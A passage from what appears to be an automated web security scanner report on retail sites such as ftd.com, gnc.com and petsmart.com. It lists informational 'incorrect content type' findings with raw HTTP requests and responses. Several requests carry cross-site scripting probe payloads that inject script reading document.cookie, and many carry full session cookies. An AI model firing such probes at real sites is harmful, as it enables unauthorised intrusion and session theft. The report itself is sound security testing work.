Content-Length: 136387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

25.16. http://www.ftd.com/empty/tealeaf.epl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /empty/tealeaf.epl

Request

POST /empty/tealeaf.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 2
X-TeaLeaf-Page-Render: 10033
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; s_sq=%5B%5BB%5D%5D; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; fsr.a=1305510842647
Content-Length: 1206

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H53M22S869R0.8543736196588725" TimeDuration="10033" DateSince1970="1305510812902" >
<Info PageLoadMilliSecs="10033" Version="200
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
Content-Type: text/html
Content-Length: 164
Date: Mon, 16 May 2011 01:58:05 GMT
X-Varnish: 767409973
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><title>TeaLeaf</title></head>
<body>
<!-- dummy page for tea leaf -->

</body>
</html>

25.17. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /sweet-shop-ctg/product-sweet-shop/

Request

GET /sweet-shop-ctg/product-sweet-shop/ HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 10:32:33 GMT
X-Varnish: 887041366
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 198838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

26. Content type incorrectly stated
There are 48 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly, analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


26.1. http://a.monetate.net/trk/3/s/a-546f7653/p/petco.com/1785161427

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-546f7653/p/petco.com/1785161427

Issue detail

The response contains the following Content-type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-546f7653/p/petco.com/1785161427?mr='10949'&mi='1.1314269718.1305510194589'&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=''&sw=1920&sh=1200&sc=32&j=!t&u='http://www.petco.com/%3FAID%3D10413444%26PID%3D2537521%26cm_mmc%3DCJ-_-CID-_-2537521-_-10413444'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 01:58:39 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:58:39 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1785161427]]);

26.2. http://a.monetate.net/trk/3/s/a-546f7653/p/petco.com/873421027

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-546f7653/p/petco.com/873421027

Issue detail

The response contains the following Content-type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-546f7653/p/petco.com/873421027?mr='10949'&mi='1.1314269718.1305510194589'&mt=!n&cs=!t&e=!(viewPage)&pt=login&r='http://www.petco.com/%3FAID%3D10413444%26PID%3D2537521%26cm_mmc%3DCJ-_-CID-_-2537521-_-10413444'&sw=1920&sh=1200&sc=32&j=!t&u='http://www.petco.com/Secure/Login.aspx%3FReturnUrl%3D/Secure/YourAccount.aspx'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 31
Expires: Mon, 09 May 2011 02:13:57 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 02:13:57 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 873421027]]);

26.3. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1081786236

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-721e8746/p/gnc.com/1081786236

Issue detail

The response contains the following Content-type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-721e8746/p/gnc.com/1081786236?mr=%2711029%27&mi=%271.1133488502.1305543174179%27&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=%27http://burp/show/8%27&sw=1920&sh=1200&sc=24&j=!t&u=%27http://www.gnc.com/home/index.jsp%3Frdir%3D1A%27&eoq=!t HTTP/1.1
Host: a.monetate.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp?rdir=1A

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:52:54 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:52:54 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1081786236]]);

26.4. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1469778385

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-721e8746/p/gnc.com/1469778385

Issue detail

The response contains the following Content-type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-721e8746/p/gnc.com/1469778385?mr=%2711029%27&mi=%271.1133488502.1305543174179%27&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=%27%27&sw=1920&sh=1200&sc=24&j=!t&u=%27http://www.gnc.com/home/index.jsp%3Fc5205--%253E%253Cscript%253Ealert%2528document.cookie%2529%253C/script%253Ebb446d17c91%3D1%27&eoq=!t HTTP/1.1
Host: a.monetate.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:57:23 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:57:23 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1469778385]]);

26.5. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1491479342

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-721e8746/p/gnc.com/1491479342

Issue detail

The response contains the following Content-type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-721e8746/p/gnc.com/1491479342?mr=%2711029%27&mi=%271.1133488502.1305543174179%27&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=%27http://burp/show/10%27&sw=1920&sh=1200&sc=24&j=!t&u=%27http://www.gnc.com/home/index.jsp%27&eoq=!t HTTP/1.1
Host: a.monetate.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:55:06 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:55:06 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1491479342]]);

26.6. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1537867128

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-721e8746/p/gnc.com/1537867128

Issue detail

The response contains the following Content-type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-721e8746/p/gnc.com/1537867128?mr='11029'&mi='1.1817838745.1305510198897'&mt=!n&cs=!t&e=!(viewPage)&pt=unknown&r='http://app.gnc.com/profile/profile.cfm'&sw=1920&sh=1200&sc=32&j=!t&u='http://www.gnc.com/community/index.jsp%2520%2520'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/community/index.jsp%20%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:16:31 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:16:31 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1537867128]]);

26.7. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1729776125

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-721e8746/p/gnc.com/1729776125

Issue detail

The response contains the following Content-type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-721e8746/p/gnc.com/1729776125?mr=%2711029%27&mi=%271.1133488502.1305543174179%27&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=%27http://burp/show/11%27&sw=1920&sh=1200&sc=24&j=!t&u=%27http://www.gnc.com/home/index.jsp%3Fc5205--%253E%253Cscript%253Ealert(document.cookie)%253C/script%253Ebb446d17c91%3D1%27&eoq=!t HTTP/1.1
Host: a.monetate.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp?c5205--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb446d17c91=1

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:56:42 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:56:42 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1729776125]]);

26.8. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/180141734

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-721e8746/p/gnc.com/180141734

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-721e8746/p/gnc.com/180141734?mr='11029'&mi='1.1817838745.1305510198897'&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=''&sw=1920&sh=1200&sc=32&j=!t&u='http://www.gnc.com/home/index.jsp'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 31
Expires: Mon, 09 May 2011 01:58:32 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:58:32 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 180141734]]);

26.9. http://a.monetate.net/trk/3/s/a-835fc909/p/orientaltrading.com/927745947

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-835fc909/p/orientaltrading.com/927745947

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-835fc909/p/orientaltrading.com/927745947?mr='11011'&mi='1.322159034.1305510206640'&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=''&sw=1920&sh=1200&sc=32&j=!t&u='http://www.orientaltrading.com/'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.orientaltrading.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 31
Expires: Mon, 09 May 2011 01:59:02 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:59:02 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 927745947]]);

26.10. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/1276278800

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-cb0f3ec6/p/petsmart.com/1276278800

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-cb0f3ec6/p/petsmart.com/1276278800?mr=%2711043%27&mi=%271.1280321277.1305543014584%27&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=%27http://burp/show/7%27&sw=1920&sh=1200&sc=24&j=!t&u=%27http://www.petsmart.com/%3F5f832--%253E%253Cscript%253Ealert(document.cookie)%253C/script%253E3105c4c3d6e%3D1%27&eoq=!t HTTP/1.1
Host: a.monetate.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3105c4c3d6e=1

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:51:38 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:51:38 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1276278800]]);

26.11. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/1821464581

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-cb0f3ec6/p/petsmart.com/1821464581

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-cb0f3ec6/p/petsmart.com/1821464581?mr='11043'&mi='1.1365981912.1305509972396'&mt=!n&cs=!t&e=!(viewPage)&pt=main&r='http://burp/show/5'&sw=1920&sh=1200&sc=32&j=!t&u='http://www.petsmart.com/%3F5f832--%253E%253Cscript%253Ealert(document.cookie)%253C/script%253E3105c4c3d6e%3D1'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3105c4c3d6e=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:49:30 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:49:30 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 1821464581]]);

26.12. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/2142672001

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-cb0f3ec6/p/petsmart.com/2142672001

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-cb0f3ec6/p/petsmart.com/2142672001?mr='11043'&mi='1.1365981912.1305509972396'&mt=!n&cs=!t&e=!(viewPage)&pt=main&r='http://www.petsmart.com/'&sw=1920&sh=1200&sc=32&j=!t&u='http://www.petsmart.com/%3Frdir%3D1A'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 32
Expires: Mon, 09 May 2011 10:17:58 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:17:58 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 2142672001]]);

26.13. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791?mr='11043'&mi='1.1365981912.1305509972396'&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=''&sw=1920&sh=1200&sc=32&j=!t&u='http://www.petsmart.com/'&eoq=!t HTTP/1.1
Host: a.monetate.net
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 31
Expires: Mon, 09 May 2011 01:53:12 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:53:12 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 491884791]]);

26.14. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/598788637

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.monetate.net
Path:   /trk/3/s/a-cb0f3ec6/p/petsmart.com/598788637

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /trk/3/s/a-cb0f3ec6/p/petsmart.com/598788637?mr=%2711043%27&mi=%271.1280321277.1305543014584%27&mt=!n&cs=!t&e=!(viewPage)&pt=main&r=%27http://burp/show/6%27&sw=1920&sh=1200&sc=24&j=!t&u=%27http://www.petsmart.com/%3F5f832--%253E%253Cscript%253Ealert(1)%253C/script%253E3105c4c3d6e%3D1%27&eoq=!t HTTP/1.1
Host: a.monetate.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1

Response

HTTP/1.0 200 OK
Content-Length: 31
Expires: Mon, 09 May 2011 10:50:15 GMT
Server: CherryPy/3.1.0.monetate1
Cache-Control: no-cache
Date: Mon, 16 May 2011 10:50:15 GMT
Content-Type: application/x-javascript
Connection: close

monetate.r([["c", 598788637]]);

26.15. http://a.netmng.com/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.netmng.com
Path:   /

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /?aid=088 HTTP/1.1
Host: a.netmng.com
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7CJeuRJCb45V6uwY1xci0duejpNnUE%2BOmzqGMogMAW%2FNCOqkjFJeQTtSSwFM8SExogUBVq3aRXr6rOPcqNTmIC7EZV1nRS%2FfrPyazw99gyUAJXaI4v2Tf%2FYK%2FYCGNRiTDad03954oMJMO7WqpnWrrDMOCdn8evhqLOus%2BDQoPhsn%2F566k%2FGwherLQ%2BEproF%2FXCsIj6ePCALj490tqdsXftKlyucODCitvFWBdAgtROhvhD%2F7o26%2F%2BaEXVdVfq0G2doyxfkgyjSVyEZ%2FKAFp0nXXviPcrzm0IBT9XrJaZhX4JHOdh009L6zCpw6vMEnwqgdhN1DhFzCDraO68xpe%2FygxfmfP5TA1ix0UfsfAVCJTBISQw%2FzSEkLmXlrBkGfU3z%2B2dNGQUP%2FXkGxf5Hu3EWLAE1mNycF4idA%2FpxTiry%2F8XmVNfippJQMpikbh5xcYcDBtG6F8xlFyLXsPkRHcxaf2Lsw8MISxRYyleY%2BZNvUnSrP9rawvOQgafzyBsl8LHMs

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:33:12 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sat, 14 May 2011 10:33:12 GMT
Last-Modified: Sat, 14 May 2011 10:33:12 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
